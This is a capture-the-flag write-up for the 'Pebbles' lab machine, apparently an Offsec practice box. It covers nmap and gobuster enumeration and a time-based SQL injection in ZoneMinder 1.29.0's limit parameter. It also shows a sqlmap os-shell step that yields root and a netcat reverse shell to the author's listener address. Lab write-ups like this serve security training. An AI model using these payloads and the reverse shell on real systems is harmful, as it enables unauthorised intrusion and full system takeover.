CTF Blog
Pebbles

Pebbles

ZERO's photo
ZERO

The "Pebbles" CTF provided valuable experience in identifying and exploiting SQL injection vulnerabilities. By leveraging tools like Nmap, Gobuster, and SQLMap, I was able to systematically enumerate the target, exploit the vulnerability, and escalate privileges to root. This exercise reinforced the importance of secure coding practices and thorough input validation in web applications.

Enumeration

Nmap Scan

To begin, I performed a basic Nmap scan to identify open ports and services running on the target machine:

nmap -sV -sC -p- -T5 192.168.162.52

Key Findings:

  • Port 21: FTP (vsftpd 3.0.3)

  • Port 22: SSH (OpenSSH 7.2p2 Ubuntu 4ubuntu2.8)

  • Port 80: HTTP (Apache httpd 2.4.18)

  • Port 3305: HTTP (Apache httpd 2.4.18)

  • Port 8080: HTTP (Apache httpd 2.4.18, hosting Tomcat and ZoneMinder)

Directory Enumeration

Using gobuster, I enumerated directories on port 8080 to discover potential entry points:

└─$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.162.52:8080
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.162.52:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 328] [--> http://192.168.162.52:8080/javascript/]
/zm                   (Status: 301) [Size: 320] [--> http://192.168.162.52:8080/zm/]
/server-status        (Status: 403) [Size: 281]

The /zm directory led to the ZoneMinder console, which was confirmed to be version 1.29.0.

Exploitation

SQL Injection Vulnerability

During testing, I identified an SQL injection vulnerability in the limit parameter of the ZoneMinder application. To confirm this, I sent the following POST request with a payload designed to cause a delay:

POST /zm/index.php HTTP/1.1
Host: 192.168.162.52:8080
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/x-www-form-urlencoded

view=request&request=log&task=query&limit=100;SELECT(SLEEP(30))

This payload caused the server to pause for 30 seconds, confirming the presence of an SQL injection vulnerability.

Automating Exploitation with SQLMap

I saved the request to a file called req then I used SQLMap to automate the exploitation process and gain an OS shell:

sqlmap -r req --dbms=mysql --os-shell -p limit

Key Steps:

  1. SQLMap detected the vulnerability in the limit parameter.

  2. It created User-Defined Functions (sys_exec and sys_eval) to execute operating system commands.

  3. A Linux OS shell was successfully obtained.

Example Commands and Outputs:

os-shell> whoami
root

Establishing a Reverse Shell

With root privileges, I established a reverse shell using Netcat:

os-shell> busybox nc 192.168.45.178 80 -e /bin/bash

On my local machine, I listened for incoming connections:

nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.162.52] 59444
whoami
root
zerosamaSQLoffsecoscptryhackme#HackTheBox